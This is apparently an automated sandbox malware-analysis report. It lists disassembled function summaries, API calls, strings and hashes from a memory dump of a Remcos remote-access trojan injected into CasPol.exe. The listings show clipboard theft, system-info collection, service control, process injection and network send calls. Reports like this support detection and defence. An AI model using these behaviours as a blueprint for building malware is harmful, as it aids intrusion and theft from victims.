                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                                                                                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID: \&G$\&G$`&G
                                                                                                                                                                          • API String ID: 269201875-253610517
                                                                                                                                                                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                                                                                                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                                                                                                                                                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 65535$udp
                                                                                                                                                                          • API String ID: 0-1267037602
                                                                                                                                                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                                                                                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                                                                                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A926
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A963
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401BD9,?), ref: 0043A9A6
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401BD9,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                                                                                                          • _free.LIBCMT ref: 0043A9C3
                                                                                                                                                                          • _free.LIBCMT ref: 0043A9CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2441525078-0
                                                                                                                                                                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                                                                                                          • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                          • String ID: h}v$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                          • API String ID: 489098229-3593927388
                                                                                                                                                                          • Opcode ID: df8985ce71915ac21d345ddac439bcb618be758bcb26d94f348ce4de2b74d619
                                                                                                                                                                          • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                                                                                                                                          • Opcode Fuzzy Hash: df8985ce71915ac21d345ddac439bcb618be758bcb26d94f348ce4de2b74d619
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                                                                                                          • GetMessageA.USER32 ref: 0040556F
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F88), ref: 00405641
                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                          • API String ID: 2956720200-749203953
                                                                                                                                                                          • Opcode ID: 7f9d91d774aaf11f537ab5c9a6bd98a6d2ee02cba41905de299277e71e7619bb
                                                                                                                                                                          • Instruction ID: af141abdc89e6f99b360bf73ca1bd21391e8bea30a055eafc68b1e1601de11b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f9d91d774aaf11f537ab5c9a6bd98a6d2ee02cba41905de299277e71e7619bb
• Instruction Fuzzy Hash: 6F419E71604301ABCB14FB76DC5A86F37A9AB85704F40493EF516A32E1EF3C8905CB9A
APIs
  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
• CloseHandle.KERNEL32(00000000), ref: 00417E20
• DeleteFileA.KERNEL32(00000000), ref: 00417E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: <$@$@VG$@VG$Temp
• API String ID: 1704390241-1291085672
• Opcode ID: a898e8ea603c6d29ef1db25c24ba6d7d39ce6cebeacd4bf41c53a35aa07d7c32
• Instruction ID: 17e4c8e037c7e297ff37edeb8814921eaebe5ca95f3622e3753009d7d6553322
• Opcode Fuzzy Hash: a898e8ea603c6d29ef1db25c24ba6d7d39ce6cebeacd4bf41c53a35aa07d7c32
• Instruction Fuzzy Hash: 15417E319002199ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32 ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@
• API String ID: 2172192267-604454484
• Opcode ID: ef8ae9684d7664f06594f68475fd3be679d13b7539e96e01851bed788577736d
• Instruction ID: 51ec5b3583c04982a71d168622c94cade283f75070810aedfe93923cca0dc87c
• Opcode Fuzzy Hash: ef8ae9684d7664f06594f68475fd3be679d13b7539e96e01851bed788577736d
• Instruction Fuzzy Hash: 41014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
• Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
• Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
• Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
APIs
• _free.LIBCMT ref: 004481B5
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 004481C1
• _free.LIBCMT ref: 004481CC
• _free.LIBCMT ref: 004481D7
• _free.LIBCMT ref: 004481E2
• _free.LIBCMT ref: 004481ED
• _free.LIBCMT ref: 004481F8
• _free.LIBCMT ref: 00448203
• _free.LIBCMT ref: 0044820E
• _free.LIBCMT ref: 0044821C
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
• Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
• Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
• Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
APIs
• _free.LIBCMT ref: 100059EA
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100059F6
• _free.LIBCMT ref: 10005A01
• _free.LIBCMT ref: 10005A0C
• _free.LIBCMT ref: 10005A17
• _free.LIBCMT ref: 10005A22
• _free.LIBCMT ref: 10005A2D
• _free.LIBCMT ref: 10005A38
• _free.LIBCMT ref: 10005A43
• _free.LIBCMT ref: 10005A51
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
• Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
• Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
• Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
• Instruction ID: 9e278d4a377d0ea10dd73248deb0d867b2e8f6339126d6964ada8e5ca1a1e79f
• Opcode Fuzzy Hash: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
• Instruction Fuzzy Hash: AA515071900909DBCB10DF58E9481BDBBB0FB49306F924197D841A7296DB798928CB1E
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
• Sleep.KERNEL32(00000064), ref: 0041755C
• DeleteFileW.KERNEL32(00000000), ref: 00417590
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                          • API String ID: 1462127192-2001430897
                                                                                                                                                                          • Opcode ID: c7c0df58ca2988e82ae5829310215e9c0806f975c384f1ee27ed20e1776dca68
                                                                                                                                                                          • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                                                                                                                                          • Opcode Fuzzy Hash: c7c0df58ca2988e82ae5829310215e9c0806f975c384f1ee27ed20e1776dca68
                                                                                                                                                                          • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 004074D9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                          • API String ID: 2050909247-4242073005
                                                                                                                                                                          • Opcode ID: 41d734f691f0bff291f27abbb43ce86c97c8aa0f168a1d918fb74810e8f30e7b
                                                                                                                                                                          • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                                                                                                                                                          • Opcode Fuzzy Hash: 41d734f691f0bff291f27abbb43ce86c97c8aa0f168a1d918fb74810e8f30e7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                                                          • int.LIBCPMT ref: 00410EBC
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                          • String ID: <kG$@kG
                                                                                                                                                                          • API String ID: 3815856325-1261746286
                                                                                                                                                                          • Opcode ID: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                                                                                          • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                                                                                                                                          • Opcode Fuzzy Hash: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                                                                                          • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                                          • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                                                                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                                          • GetMessageA.USER32 ref: 0041D591
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                          • String ID: Remcos
                                                                                                                                                                          • API String ID: 1970332568-165870891
                                                                                                                                                                          • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                                                                                          • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                                                                                          • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                                                                                                                                          APIs
                                                                                                                                                                          • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                          • String ID: Remcos v$5.2.0 Pro$CONOUT$$h]v
                                                                                                                                                                          • API String ID: 4067487056-2805384329
                                                                                                                                                                          • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                                                                                          • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
